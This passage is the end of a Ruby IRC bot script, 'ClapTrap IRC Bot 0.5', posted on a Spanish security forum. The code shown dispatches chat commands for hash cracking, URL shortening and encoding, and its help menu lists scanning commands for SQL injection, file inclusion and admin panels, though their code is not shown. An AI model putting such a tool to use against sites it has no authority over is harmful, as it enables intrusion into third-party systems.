if mensaje=~/!crackit (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,crack_md5(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!tinyurl (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,tiny_url(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!httpfinger (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,get_httpfinger(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!md5 (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,md5_encode(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!base64 (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,codificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,decodificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
end
if mensaje=~/!hex (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,codificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,decodificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
end
if mensaje=~/!ascii (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...
\n
"
respuesta(admin,codificar_ascii(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished
\n
"
end
if mensaje=~/!help/
about = ""
about = about + "Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014" + "
\n
";
about = about + "[++] Commands" + "
\n
";
about = about + "[+] !help" + "
\n
";
about = about + "[+] !locateip <web>" + "
\n
";
about = about + "[+] !sqlifinder <dork> <count pages> <google/bing>" + "
\n
";
about = about + "[+] !rfifinder <dork> <count pages> <google/bing>" + "
\n
";
about = about + "[+] !panel <page>" + "
\n
";
about = about + "[+] !fuzzdns <domain>" + "
\n
";
about = about + "[+] !sqli <page>" + "
\n
";
about = about + "[+] !lfi <page>" + "
\n
";
about = about + "[+] !crackit <hash>" + "
\n
";
about = about + "[+] !tinyurl <page>" + "
\n
";
about = about + "[+] !httpfinger <page>" + "
\n
";
about = about + "[+] !md5 <text>" + "
\n
";
about = about + "[+] !base64 <encode/decode> <text>" + "
\n
";
about = about + "[+] !ascii <encode/decode> <text>" + "
\n
";
about = about + "[+] !hex <encode/decode> <text>" + "
\n
";
about = about + "[++] Enjoy this IRC Bot" + "
\n
";
respuesta(admin,about)
end
end
end
end
end
end
head()
print "[+] Host : "
host = gets.chomp
print "
\n
[+] Port : "
port = gets.chomp
print "
\n
[+] Channel : "
channel = gets.chomp
print "
\n
[+] Admin : "
admin = gets.chomp
bot_online(host,port,channel,admin)
copyright()
# The End ?
Eso es todo.
«
Última modificación: Septiembre 26, 2015, 12:06:28 am por Doddy
»
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Programación
»
Scripting
»
[Ruby] ClapTrap IRC Bot 0.5
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more